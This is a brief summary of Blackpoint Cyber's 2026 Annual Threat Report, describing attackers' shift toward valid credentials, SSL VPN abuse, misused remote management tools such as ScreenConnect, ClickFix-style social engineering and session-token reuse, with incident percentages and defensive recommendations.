Blackpoint Cyber’s 2026 Annual Threat Report shows attackers increasingly gain access by using valid credentials, trusted administrative tools, and user-driven social engineering instead of exploiting software vulnerabilities. Key vectors include SSL VPN abuse, widespread misuse of RMM tools like ScreenConnect, ClickFix-style campaigns, and session-token reuse after MFA, and the report urges treating remote access as high-risk and tightening controls to detect legitimate-looking intrusions #Roadk1ll #ScreenConnect.
Keypoints
- Attackers increasingly enter networks using valid credentials and legitimate remote access instead of exploiting software vulnerabilities.
- SSL VPN abuse was the most common initial access vector, accounting for 32.8% of identifiable incidents.
- RMM tool misuse appeared in 30.3% of incidents, with ScreenConnect present in over 70% of rogue RMM cases.
- Social engineering campaigns like fake CAPTCHA and ClickFix-style prompts drove 57.5% of incidents by tricking users into running built-in Windows commands.
- Cloud compromises often involved session-token reuse after MFA (about 16%), and implants such as Roadk1ll enabled lateral movement and persistence.